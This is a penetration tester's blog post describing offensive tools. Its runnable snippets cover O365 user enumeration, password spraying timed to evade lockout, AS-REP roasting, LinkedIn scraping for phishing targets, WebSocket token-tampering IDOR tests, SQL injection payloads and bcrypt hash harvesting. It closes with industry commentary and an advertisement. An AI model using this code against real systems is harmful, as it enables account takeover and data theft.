
Heads Down in the Trenches: Tool Development and End-of-Year Offensive Work


It's been a few weeks since my last post. I've been busy. The end of the year always seems to get us. Organizations are scrambling to close out projects that have been lingering for months, budgets are coming to a close, and with that comes an influx of high-priority, short-notice work. Sleep becomes optional.


Most of my time has been spent on offensive technical work: external and internal penetration tests and public-facing web application testing. With that comes tool development, or in some cases redevelopment. Some tools we build are case-specific and can't really be shared without spending significant time sanitizing them. Others, though, make it into the toolkit.


The Tools


The tools that can be shared are included in my VA-PT Toolkit on GitHub. Here's what's been added or updated recently:


quick_recon.py


This one is still heavily under development, but it's already saving me significant time. The core problem: I had a collection of individual tools and manual processes I was running on every external engagement. LinkedIn enumeration with one script. Bucket discovery with another. DNS brute forcing followed by manual wildcard detection. GitHub secret scanning. All separate. All time-consuming to run individually, with results that had to be correlated by hand.


So I started consolidating.


LinkedIn Enumeration: Most of the common LinkedIn scraping tools have stopped working correctly; either LinkedIn changed its anti-automation measures or the tools just weren't maintained. The ones that did work didn't provide the depth I needed. Employee names are useful, but I also want titles, reporting structure, department mapping, and tenure data. That information shapes social engineering campaigns and helps identify high-value targets for spear phishing. I built my own module that handles authentication via session cookies and extracts the full employee dataset with organizational context.


Cloud Storage Enumeration: Manually checking for exposed S3 buckets, Azure Blob containers, and GCP storage gets tedious fast. The tool generates naming permutations based on the target domain: company name, abbreviations, common patterns like {company}-dev, {company}-backup, {company}-prod. It then checks for public access. When it finds something open, it categorizes files by sensitivity: environment configs, database dumps, and credentials get flagged as high-interest; documentation and source code as medium; everything else gets logged but not prioritized. Automatic download with size limits so you're not pulling down 50GB of useless data.
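To make that concrete, here's a minimal sketch of the permute-and-probe idea for S3; the toolkit module handles Azure and GCP the same way, and the suffix list here is a tiny illustrative subset:

```python
import requests

# Illustrative subset; the real module uses a much longer pattern list.
SUFFIXES = ["", "-dev", "-backup", "-prod", "-staging", "-assets"]

def candidate_buckets(company: str):
    """Yield bucket-name permutations built from the company name."""
    for suffix in SUFFIXES:
        yield f"{company}{suffix}"

def check_s3(bucket: str) -> str:
    """Classify a bucket by its unauthenticated HTTP response:
    200 = publicly listable, 403 = exists but private, 404 = no such bucket."""
    r = requests.get(f"https://{bucket}.s3.amazonaws.com", timeout=10)
    if r.status_code == 200:
        return "PUBLIC (listable)"
    if r.status_code == 403:
        return "exists (access denied)"
    return "not found"

for name in candidate_buckets("company"):
    print(f"{name}: {check_s3(name)}")
```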


DNS Enumeration with Certificate Transparency: Here's where it gets interesting. DNS brute forcing alone isn't enough. You're limited to whatever wordlist you're using, and you're going to miss subdomains with unusual names. That's where crt.sh comes in.

crt.sh is a certificate transparency log search engine. When a certificate authority issues an SSL certificate, that issuance gets logged to public Certificate Transparency logs, a requirement since 2018 for certificates to be trusted by major browsers. These logs are searchable, which means if a company has ever been issued a certificate for internal-admin-portal.company.com, that subdomain is now public knowledge even if it never shows up in a brute-force wordlist.
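crt.sh exposes a JSON endpoint that makes this query trivial. A minimal sketch of the lookup (crt.sh throttles aggressively and sometimes times out on large domains, so treat this as a starting point):

```python
import requests

def crtsh_subdomains(domain: str) -> set[str]:
    """Pull every name that has ever appeared on a certificate for the domain."""
    url = f"https://crt.sh/?q=%25.{domain}&output=json"
    entries = requests.get(url, timeout=30).json()
    names = set()
    for entry in entries:
        # name_value can contain several SAN entries separated by newlines
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower().lstrip("*.")
            if name.endswith(domain):
                names.add(name)
    return names

print("\n".join(sorted(crtsh_subdomains("example.com"))))
```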


The tool queries crt.sh for all certificates issued to the target domain, extracts every subdomain from the certificate SANs (Subject Alternative Names), and cross-references this against DNS brute force results. Wildcards get detected and filtered: if *.company.com resolves to the same IP regardless of what you put in front of it, you know it's a wildcard and can discard those false positives. The result is a validated list of actual subdomains from both passive and active enumeration.
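The wildcard check itself is straightforward: resolve a few labels that can't plausibly exist and see what comes back. Roughly:

```python
import socket
import uuid

def wildcard_ips(domain: str) -> set[str]:
    """Resolve random labels; any IPs they return are wildcard answers."""
    ips = set()
    for _ in range(3):
        probe = f"{uuid.uuid4().hex}.{domain}"
        try:
            ips.update(info[4][0] for info in socket.getaddrinfo(probe, None))
        except socket.gaierror:
            return set()  # random label didn't resolve, so no wildcard
    return ips

def is_real(subdomain: str, wildcards: set[str]) -> bool:
    """A brute-force hit only counts if it resolves somewhere non-wildcard."""
    try:
        ips = {info[4][0] for info in socket.getaddrinfo(subdomain, None)}
    except socket.gaierror:
        return False
    return not ips <= wildcards  # subset of wildcard IPs = false positive
```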


GitHub Secret Scanning: Developers commit credentials. It happens constantly. API keys, database passwords, AWS access keys, internal URLs: I've found all of it in client repositories. The module searches for the target organization's public repos and scans commit history for secrets using pattern matching: high-entropy strings, known credential formats, environment variable patterns. Results get categorized by confidence level and potential impact.
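Detection boils down to two passes: known-format regexes, then an entropy test for random-looking strings. A simplified sketch, with an illustrative threshold and a deliberately short pattern list:

```python
import math
import re

# Illustrative subset; the real module carries far more credential formats.
PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "env_assignment": re.compile(r"(?i)(?:password|secret|token)\s*=\s*\S+"),
}

def shannon_entropy(s: str) -> float:
    """Bits per character; random keys score well above English prose."""
    freq = {c: s.count(c) / len(s) for c in set(s)}
    return -sum(p * math.log2(p) for p in freq.values())

def scan_blob(text: str):
    for label, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            yield ("pattern", label, match.group())
    for token in re.findall(r"[A-Za-z0-9+/=_-]{24,}", text):
        if shannon_entropy(token) > 4.2:  # tunable threshold
            yield ("entropy", "high_entropy_string", token)
```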


The Integration: All of this runs in phases. Scope validation first, then DNS and technology fingerprinting, then OSINT collection, then cloud enumeration. Results feed into a consolidated report with JSON output for further processing. Skip flags let you disable modules you don't need. The goal is one command that handles the first two hours of external reconnaissance automatically.
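Structurally, it's a phase list behind an argument parser. The flag names and stub functions below are illustrative stand-ins, not the tool's actual CLI:

```python
import argparse
import json

def run_dns(domain):   return {"subdomains": []}   # stub
def run_osint(domain): return {"employees": []}    # stub
def run_cloud(domain): return {"buckets": []}      # stub

parser = argparse.ArgumentParser(prog="quick_recon.py")
parser.add_argument("domain")
parser.add_argument("--skip-osint", action="store_true")
parser.add_argument("--skip-cloud", action="store_true")
parser.add_argument("--json-out", default="recon_results.json")
args = parser.parse_args()

report = {"target": args.domain, "dns": run_dns(args.domain)}
if not args.skip_osint:
    report["osint"] = run_osint(args.domain)
if not args.skip_cloud:
    report["cloud"] = run_cloud(args.domain)

with open(args.json_out, "w") as f:
    json.dump(report, f, indent=2)  # consolidated output for further processing
```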


o365_recon_spray.py


A lot of the classic O365 enumeration and spraying tools have stopped working: developed in Python 2, no longer maintained, or built around a specific endpoint Microsoft has since patched. So I threw together a modern version.


Username Enumeration: The tool uses three different Microsoft endpoints, each with different response characteristics.


The GetCredentialType API at login.microsoftonline.com/common/GetCredentialType is the most reliable. Send a POST with a username, and the IfExistsResult field tells you if the account exists: 0 means valid, 1 means invalid, 5 or 6 indicate valid with additional states. It also returns federation information if the domain uses ADFS or third-party identity providers. The catch is aggressive rate limiting: hit it too hard and you'll get throttled.
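A minimal probe against that endpoint, assuming nothing beyond requests; throttle yourself or Microsoft will do it for you:

```python
import requests

def if_exists(username: str) -> int:
    """POST to GetCredentialType; IfExistsResult 0 = valid, 1 = invalid."""
    r = requests.post(
        "https://login.microsoftonline.com/common/GetCredentialType",
        json={"Username": username},
        timeout=10,
    )
    return r.json().get("IfExistsResult", -1)

for user in ("jsmith@company.com", "nosuchuser@company.com"):
    print(user, "->", if_exists(user))
```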


ActiveSync at outlook.office365.com/Microsoft-Server-ActiveSync is the fallback. Send an OPTIONS request with basic auth credentials (any password). A 401 response means the user exists but the password is wrong. A 404 means the user doesn't exist. Less rate limiting, but also less reliable for some tenant configurations.
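Sketched, the ActiveSync check looks like this; the password is deliberately junk because only the status code matters:

```python
import requests

def activesync_exists(username: str) -> bool | None:
    """OPTIONS with throwaway creds: 401 = user exists, 404 = no such user."""
    r = requests.options(
        "https://outlook.office365.com/Microsoft-Server-ActiveSync",
        auth=(username, "NotARealPassword1!"),
        timeout=10,
    )
    if r.status_code == 401:
        return True
    if r.status_code == 404:
        return False
    return None  # ambiguous: tenant config quirk or throttling
```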


OneDrive URL probing transforms the domain, replacing dots with underscores, to construct the SharePoint personal URL format. For company.com and user jsmith, it builds company_com-my.sharepoint.com/personal/jsmith_company_com/ and checks if it exists. A 302, 401, or 403 indicates a valid user with OneDrive provisioned. Useful for confirming accounts, but it requires OneDrive to be enabled.
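A sketch of that URL construction as described; tenant naming conventions vary between organizations, so validate the pattern against a known-good account first:

```python
import requests

def onedrive_provisioned(domain: str, user: str) -> bool:
    """Probe the personal-site URL; 302/401/403 means the user exists."""
    mangled = domain.replace(".", "_")  # company.com -> company_com
    url = f"https://{mangled}-my.sharepoint.com/personal/{user}_{mangled}/"
    r = requests.get(url, allow_redirects=False, timeout=10)
    return r.status_code in (302, 401, 403)
```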


The tool tries GetCredentialType first, automatically falls back to ActiveSync when rate limited, and can use OneDrive for validation. All three methods get logged separately so you can see which technique confirmed each account.


Password Policy Analysis: Before spraying, you need to understand lockout thresholds. The tool probes for smart lockout configuration, estimates lockout duration based on response timing, and checks for MFA enforcement indicators. This informs spray timing: if lockout is 10 attempts per 30 minutes, you spray one password across your entire user list, wait 31 minutes, then spray the next password.


The Spray: Configurable delays between users (randomized within a range to avoid pattern detection) and between password rounds. State gets saved to disk, so if you interrupt the spray or lose your connection, you can resume from where you left off. Valid credentials get logged immediately with the endpoint that confirmed them.
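The resume logic is just serialized state plus disciplined sleeps. A stripped-down sketch: try_login stands in for whichever endpoint check you're using, and the file name and jitter range are illustrative:

```python
import json
import random
import time

STATE_FILE = "spray_state.json"  # illustrative name

def load_state():
    try:
        with open(STATE_FILE) as f:
            return json.load(f)
    except FileNotFoundError:
        return {"round": 0, "index": 0, "valid": []}

def save_state(state):
    with open(STATE_FILE, "w") as f:
        json.dump(state, f)

def spray(users, passwords, try_login, lockout_wait=31 * 60):
    state = load_state()
    for rnd in range(state["round"], len(passwords)):
        for i in range(state["index"], len(users)):
            if try_login(users[i], passwords[rnd]):
                state["valid"].append(users[i])  # log hits immediately
            state.update(round=rnd, index=i + 1)
            save_state(state)                    # survives interruption
            time.sleep(random.uniform(2, 8))     # jitter between users
        state.update(round=rnd + 1, index=0)
        save_state(state)
        if rnd + 1 < len(passwords):
            time.sleep(lockout_wait)             # one password per lockout window
    return state["valid"]
```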


I'll likely merge this into quick_recon at some point as an optional module. For now it's standalone.


windows_enum.py and ad_enum.py


Purpose-built for a specific scenario: very large internal network, not many Windows machines immediately visible, but the ones I could see were domain-joined. I needed to find Domain Controllers fast across a massive IP range while nmap handled broader enumeration in the background.


windows_enum.py handles initial Windows system discovery. The port signature for Windows identification is specific: 135 (RPC Endpoint Mapper), 139 (NetBIOS Session Service), 445 (SMB), 3389 (RDP). The tool scans for these ports with configurable threading.
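The discovery pass is nothing fancy: a threaded TCP connect scan against those four ports. A minimal sketch:

```python
import socket
from concurrent.futures import ThreadPoolExecutor

WINDOWS_PORTS = (135, 139, 445, 3389)  # RPC, NetBIOS, SMB, RDP

def open_ports(host: str, timeout: float = 1.0) -> list[int]:
    found = []
    for port in WINDOWS_PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                found.append(port)
    return found

def scan(hosts: list[str], threads: int = 64) -> dict[str, list[int]]:
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(zip(hosts, pool.map(open_ports, hosts)))
    return {host: ports for host, ports in results if ports}

print(scan([f"10.0.0.{i}" for i in range(1, 255)]))
```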


Once Windows systems are identified, enumeration begins. Impacket's lookupsid.py handles RID cycling, starting from RID 500 (Administrator) and walking through the range to enumerate users and groups. samrdump.py pulls SAM database information when accessible. rpcdump.py enumerates RPC endpoints. smbclient.py handles share enumeration and file listing. All of this works with null sessions when available or falls back to authenticated enumeration if you have credentials.
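Most of the tool is thin orchestration around those Impacket scripts. A sketch of the RID-cycling wrapper; the parse regex assumes lookupsid.py's usual '500: DOMAIN\Administrator (SidTypeUser)' output lines:

```python
import re
import subprocess

RID_LINE = re.compile(r"(\d+): (.+) \((SidType\w+)\)")

def rid_cycle(target: str, creds: str = "", max_rid: int = 4000):
    """Shell out to Impacket's lookupsid.py; creds like 'DOMAIN/user:pass'.
    With no creds, -no-pass attempts a null session."""
    cmd = ["lookupsid.py", f"{creds}@{target}", str(max_rid)]
    if not creds:
        cmd.append("-no-pass")
    out = subprocess.run(cmd, capture_output=True, text=True).stdout
    # Return (rid, name, sid_type) tuples for the consolidated report
    return [(int(m[1]), m[2], m[3]) for m in RID_LINE.finditer(out)]
```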


Results get consolidated per-system: computer name, domain membership, domain SID, enumerated users, groups, shares, RPC endpoints, and active sessions. Everything dumps to both JSON and human-readable reports.


ad_enum.py is the Domain Controller-specific variant. Rapid DC discovery across large IP ranges with subnet exclusion support, which is useful when you have a /16 to scan but need to skip certain ranges. Once DCs are identified, it focuses on AD-specific enumeration: GetADUsers.py for user extraction via LDAP, GetNPUsers.py for AS-REP roasting (accounts with "Do not require Kerberos preauthentication" enabled), and GetUserSPNs.py for Kerberoastable accounts.


The AS-REP roasting workflow is automated: enumerate users, write them to a file, run GetNPUsers against the DC, output hashes in hashcat format. Same with share enumeration and access testing. User lists are formatted for direct use in subsequent attacks: password spraying, Kerberoasting, whatever comes next.
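The GetNPUsers step is essentially one subprocess call; the flags below are Impacket's standard ones:

```python
import subprocess

def asrep_roast(domain: str, dc_ip: str, users_file: str = "users.txt"):
    """Run Impacket's GetNPUsers.py against the DC; hashes land in
    hashcat format, ready for: hashcat -m 18200 asrep_hashes.txt wordlist"""
    subprocess.run([
        "GetNPUsers.py", f"{domain}/",
        "-usersfile", users_file,
        "-format", "hashcat",
        "-outputfile", "asrep_hashes.txt",
        "-dc-ip", dc_ip,
        "-no-pass",
    ], check=False)
```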


Both tools prioritize speed over stealth. These aren't for slow-and-low operations; they're for when you need answers fast on an internal engagement with limited time.


The Anvil WebSocket Attack Framework


One of the more interesting tools to come out of this stretch was built for attacking an Anvil application via WebSockets. The target was using Anvil's capability token system for authorization, a cryptographic approach where access to each database row requires a specific token with a MAC binding the token to that row. I needed a way to intercept, analyze, and exploit this traffic systematically.


Database Structure Enumeration: Here's what made this attack particularly effective. After authenticating to the application, the Anvil server sent down a vt_global structure containing the database schema—table IDs, column names, data types, and relationships.


The server essentially hands you a map of the entire backend data model.


Table 2931 is Auth Users (email, password_hash, enabled, confirmed_email). Table 2935 is User Profiles (name, email, role_links, tenant_link, organization_link). Table 2956 is Roles (name, is_admin, permissions). The schema shows exactly which columns contain sensitive data and how tables relate to each other through foreign keys. No guessing, no fuzzing—the application tells you precisely what to target and how the data connects.

This meant I could build queries targeting exactly the right table IDs and column names from the start. When enumerating users, I knew to request columns ["email", "password_hash", "enabled"] from table 2931. When following link traversal, I knew that User Profiles link to Auth Users through specific foreign key columns. The schema-first approach eliminated trial and error entirely.


Capability Token Mechanics: Anvil's tokens contain a scope (defining which table and row they authorize), a MAC (cryptographic signature binding the token to that scope), and narrow constraints. The MAC should prevent tampering—you can't just change the row_id and access other records. But the tokens flow through WebSocket messages, which means they're interceptable and replayable.


The tool hooks into OWASP ZAP's WebSocket API to capture all traffic between browser and server. Every capability token that passes through gets extracted, categorized by table type (users, roles, permissions, organizations, etc.), and stored with its associated channel ID. The capture happens passively while you browse the application normally—just building up a collection of valid tokens for later exploitation.
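A sketch of the capture loop. This assumes the ZAP WebSocket add-on's messages API view and a local ZAP instance; verify the view and field names against your ZAP version, and note the token-marker regex is a hypothetical placeholder:

```python
import re
import requests

ZAP = "http://127.0.0.1:8080"
APIKEY = "your-zap-api-key"

# Hypothetical marker for Anvil capability tokens in message payloads;
# match it to what you actually see on the wire.
CAP_MARKER = re.compile(r'"capability"')

def ws_messages(start: int = 0, count: int = 100) -> list[dict]:
    """Pull captured WebSocket messages from ZAP's websocket add-on."""
    r = requests.get(
        f"{ZAP}/JSON/websocket/view/messages/",
        params={"apikey": APIKEY, "start": start, "count": count},
        timeout=10,
    )
    return r.json().get("messages", [])

# Passive harvest: browse the app through ZAP, then sweep the buffer.
for msg in ws_messages():
    payload = msg.get("payload", "")
    if CAP_MARKER.search(payload):
        print("token candidate in channel", msg.get("channelId"))
```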


IDOR and Privilege Testing: Once tokens are captured, the tool tests whether the MAC is actually validated per-row or just per-table. It takes a valid token for row N, modifies the scope to row N+1 while keeping the same MAC, and sends the request. If it succeeds, the application is vulnerable to IDOR—the MAC isn't properly binding to the row_id. It also tests write and delete operations against captured tokens to determine permission boundaries.
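The tamper test itself, sketched against a hypothetical message layout; where the scope and MAC actually sit depends on what you observe on the wire:

```python
import copy
import json

def make_idor_probe(captured_msg: dict, new_row_id: str) -> str:
    """Clone a captured request, bump only the row id inside the token's
    scope, and keep the original MAC. If the server honors it, the MAC
    isn't binding to the row. Field placement here is hypothetical."""
    probe = copy.deepcopy(captured_msg)
    token = probe["args"][0]            # hypothetical: capability in first arg
    token["scope"][-1] = new_row_id     # hypothetical: row id ends the scope
    # token["mac"] deliberately left untouched
    return json.dumps(probe)
```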


Link Traversal Exploitation: Anvil tables have foreign key relationships—a User Profile might link to an Auth User record which contains the password hash. The tool automatically follows these relationships: fetch a User Profile, extract any linked capability tokens from the response, use those to access the linked records, repeat. This chains through the data model, capturing tokens for records you'd never see through normal application use. On one engagement this turned a handful of captured User Profile tokens into complete access to Auth Users, Roles, Permissions, and Organizations tables.


SQL Injection Suite: Why not just use sqlmap, you're probably asking? Because sqlmap doesn't speak Anvil's WebSocket protocol. The injection points aren't in HTTP parameters; they're buried in JSON command structures flowing over WebSocket connections through ZAP. Sqlmap would need a custom tamper script to construct valid Anvil messages, hook into ZAP's WebSocket API, handle the async request/response matching, and parse capability tokens out of responses. At that point you're writing more glue code than just building the tool from scratch.


So the SQLi module is purpose-built for this environment. Error-based testing with 30+ payloads looking for database error signatures in responses. Boolean-based with true/false payload pairs measuring response length differences. Time-based with pg_sleep, SLEEP, and WAITFOR DELAY payloads, comparing response times against baseline. Union-based with automatic column count detection. Stacked queries for databases that support them. All of this runs in parallel with threading, automatically identifying injection points in the WebSocket command structure—args arrays, kwargs dictionaries, column name fields, anywhere user-controlled data touches the backend.
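As one example of the methodology, here's roughly what the time-based pass looks like. send_query stands in for the function that pushes a payload down the WebSocket and blocks until the response arrives:

```python
import statistics
import time

TIME_PAYLOADS = [
    "'||pg_sleep(5)--",            # PostgreSQL
    "' AND SLEEP(5)-- -",          # MySQL
    "'; WAITFOR DELAY '0:0:5'--",  # MSSQL
]

def timed(send_query, payload: str) -> float:
    start = time.monotonic()
    send_query(payload)
    return time.monotonic() - start

def time_based_sqli(send_query, runs: int = 5) -> list[str]:
    """Flag payloads whose response time clears baseline by ~the sleep."""
    baseline = statistics.median(timed(send_query, "'") for _ in range(runs))
    return [p for p in TIME_PAYLOADS if timed(send_query, p) > baseline + 4]
```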


When SQLi is confirmed, the tool spawns an interactive shell. Built-in commands for database enumeration (!tables, !columns, !dump), hash extraction (!hashes tries Anvil's table 2931 plus common table names plus PostgreSQL system tables), privilege checking (!privs), and file reading (!file). Raw payloads get sent directly for manual exploitation.


Password Hash Extraction: The tool automatically scans all incoming WebSocket traffic for bcrypt hash patterns ($2a$, $2b$, $2y$). When found, they're logged with associated email addresses when available, categorized by source, and saved for offline cracking. Between link traversal pulling Auth User records and SQLi extracting directly from the database, I walked away from this engagement with a significant number of password hashes.
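The hash-scraping pass is a pair of regexes over every inbound payload. A sketch:

```python
import re

# bcrypt: $2a$/$2b$/$2y$, two-digit cost, then 53 chars of salt + digest
BCRYPT = re.compile(r"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")
EMAIL = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")

def extract_hashes(payload: str) -> list[tuple[str, str | None]]:
    """Pair each bcrypt hash with the nearest preceding email, if any."""
    results = []
    for match in BCRYPT.finditer(payload):
        emails = EMAIL.findall(payload[: match.start()])
        results.append((match.group(), emails[-1] if emails else None))
    return results
```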


The second component focuses specifically on the login endpoint (anvil.private.users.login_with_email) for authentication bypass testing and user enumeration. Same SQLi methodology, plus timing-based and error-based user enumeration, plus brute force with configurable threading.


Because this tool was built specifically for a client's deployment environment—with hardcoded table structures, endpoint configurations, and attack chains tailored to their implementation—this one stays in the vault. Too much sanitization work to make it generic, and frankly the value was in the approach, not the code itself. The methodology translates: intercept the schema, map the relationships, follow the tokens, extract the data.


On AI-Assisted Development


A quick note on how these tools get built: agentic AI has fundamentally changed my development workflow. Whether I'm writing offensive tooling or building out defensive automation, AI-assisted development (some people call it "vibe coding") has become a force multiplier I can't ignore.


I'm not talking about asking ChatGPT to explain a Python function. I'm talking about using AI agents to scaffold entire modules, debug edge cases in real-time, refactor code while I focus on the attack logic, and iterate through implementations faster than I ever could manually. The Anvil framework, the O365 sprayer, the recon automation—all of these came together significantly faster because I wasn't grinding through boilerplate alone.


Anyone in this industry who hasn't fully embraced agentic AI is either lying about their workflow or so far behind the curve they're making themselves ineffective to their employers and clients. The attackers are using these tools. If you're on defense, or offense, and you're not, you're already at a disadvantage.


The "Penetration Test" Problem


I've reviewed a lot of third-party "penetration test" reports over the past few months. The majority of them were complete garbage. It was glaringly obvious no actual work was done—just output generated from Burp, ZAP, and Nessus with some minor wording and formatting changes. Different logo, same scanner output. That's not a penetration test. That's a vulnerability scan with a markup.


I need to say this plainly: if your security vendor runs Nessus, reformats the output into a branded template, and hands you a "penetration test report," you've been scammed.


The firms doing this, and there are a lot of them, are actively making the security industry worse. They're undercutting legitimate testers on price because their actual deliverable requires almost no skill. They're setting client expectations incorrectly about what a penetration test should look like. And they're leaving organizations with a false sense of security that will evaporate the moment an actual attacker shows up.


Real adversaries don't run a single scanner and call it a day. They chain findings. They pivot. They develop custom tooling when off-the-shelf doesn't work. They understand business context and go after what actually matters. They persist for days or weeks, not hours.


The reports I've seen are filled with findings like "SSL Certificate Expiry" and "Missing HTTP Security Headers" and "Server Version Disclosure"—all valid findings, but none of them are what's going to get you compromised. Meanwhile the actual critical issues—the password reuse across service accounts, the misconfigured trust relationships, the exposed internal applications, the cloud storage with customer PII—go completely unnoticed because nobody actually looked. They ran the scan, exported the PDF, and moved on to the next client.


If your "penetration test" didn't include manual testing, if nobody tried to chain vulnerabilities together, if there's no evidence of actual exploitation attempts in the report—you didn't get a penetration test. You got an expensive vulnerability scan and a company that's hoping you don't know the difference.


Need Actual Testing?


If you're reading this and realizing your current security testing isn't what you thought it was, or if you're looking for offensive testing that actually simulates how real attackers operate, let's talk.


We test the way attackers attack. That's the only way to find what actually matters before someone else does.


Keith Pachulski

Red Cell Security, LLC

 
 
 
